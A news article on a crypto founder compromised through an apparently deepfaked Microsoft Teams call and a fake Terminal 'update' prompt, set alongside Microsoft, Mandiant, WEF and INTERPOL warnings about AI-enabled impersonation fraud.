AI scams in crypto approach breaking point

Make preferred on

A crypto founder had his laptop compromised when he joined what appeared to be a Microsoft Teams call with Pierre Kaklamanos, a Cardano Foundation contact he had spoken with before.

When “Pierre” reached out about Atrium and sent a Teams invite, nothing looked out of place. On the call, the face and voice matched what he remembered, and two other apparent foundation members were present.

When the call lagged and dropped him, a prompt told him his Teams software was out of date and needed reinstalling through Terminal. He ran the command, then shut the laptop off because the battery was dying, which limited the damage in retrospect.

He describes himself as “quite technically savvy,” which is part of the point that the attack worked because the context felt legitimate.

Social engineers have always relied on familiarity, and executing that at scale once required either a compromised account or weeks of text-based rapport-building.

The video call was the authentication layer, the thing victims learned to trust, and replicating it is now within reach.

Fake update

Microsoft documented campaigns in February and March 2026 in which malicious files masqueraded as workplace apps, such as msteams.exe and zoomworkspace.clientsetup.exe, with phishing lures that mimicked legitimate Teams and Zoom meeting workflows.

In a separate warning, Microsoft described “ClickFix”-style prompts targeting macOS users, instructing them to paste commands into Terminal and targeting browser passwords, crypto wallets, cloud credentials, and developer keys.

The fake Teams update fits both patterns simultaneously.

Google Cloud’s Mandiant unit described a crypto-focused intrusion built on the same structure. A compromised Telegram account, a spoofed Zoom meeting, what witnesses described as a deepfake-style executive video, and troubleshooting commands that launched the infection.

Mandiant said it could not independently verify which AI model, if any, generated the video, but confirmed the group used fake meetings and AI tools during social engineering.

On Apr. 24, the real Pierre Kaklamanos posted on X saying his Telegram had been hacked and that someone was impersonating him, along with “a few other people in the industry this week.”

He told followers to avoid clicking links or booking meetings through the account and to verify contact through LinkedIn direct messages.

By then, the founder had already messaged the account suggesting they switch to Google Meet. Whoever controlled Pierre’s Telegram account replied that he had gotten busy and asked to reschedule, with the attacker still managing the persona once the call ended.

Read More:  White House crypto czar leaves office after securing crypto wins for banks and institutions instead of Bitcoin

That exchange turns the incident from an isolated embarrassment into a live campaign signal that the method is active, the account compromise is the entry point, and the relationship history is the weapon.

Stage What the victim saw Why it looked legitimate What the attacker was likely trying to achieve
Initial outreach “Pierre” reached out about Atrium and suggested a call The victim had spoken with Pierre before, including on video Reopen an existing trust relationship instead of starting from a cold approach
Meeting setup A Microsoft Teams invite for the next day Teams is a normal business workflow and the topic was plausible Move the target into a controlled environment that felt routine
Live call Familiar face, familiar voice, plus two other apparent Cardano Foundation members The social context matched the victim’s memory of prior interactions Lower suspicion and make the call itself feel like verification
Call disruption Lagging, instability, then getting kicked out Technical glitches are common in video calls Create frustration and set up the fake “fix” as a normal troubleshooting step
Fake update prompt A message saying Teams was out of date and needed reinstalling through Terminal Software update prompts are familiar, and the user rarely used Teams Get the victim to execute a malicious command directly
Command execution The victim ran the command, then shut down the laptop because the battery was dying The workflow still felt like a routine app fix at that moment Launch the infection chain and gain access to credentials or device data
Post-call follow-up The victim suggested switching to Google Meet; the attacker said he got busy and asked to reschedule The persona continued behaving like a real contact after the failed attempt Keep the relationship alive for another attempt and avoid immediate suspicion

Why generative media changes the threat surface

The founder said he now believes the call may have involved AI-generated or manipulated video. Forensic confirmation of the tools is lacking, and the OpenAI connection here is governed by its own safety documentation.

OpenAI launched its 4o image generation model on Mar. 25, describing it as capable of “precise, accurate, photorealistic outputs,” and released the ChatGPT Images 2.0 System Card on Apr. 21.

Read More:  Cardano targets Bitcoin liquidity with $80 million fund

The firm stated that the model’s “heightened realism” could, absent safeguards, enable more convincing deepfakes of real people, places, or events. One of the leading AI labs has now put on record that its own image model raises the ceiling on what a convincing fake can look like.

The World Economic Forum said in January 2026 that generative AI lowers the barrier to phishing while raising its credibility, through realistic deepfake audio and video that can evade both detection systems and human scrutiny.

INTERPOL declared financial fraud one of the world’s most severe and rapidly evolving transnational crimes in March 2026, identifying deepfake videos, audio, and chatbots as tools that make impersonation of trusted people easier to carry out at scale.

CryptoSlate Daily Brief

Daily signals, zero noise.

Market-moving headlines and context delivered every morning in one tight read.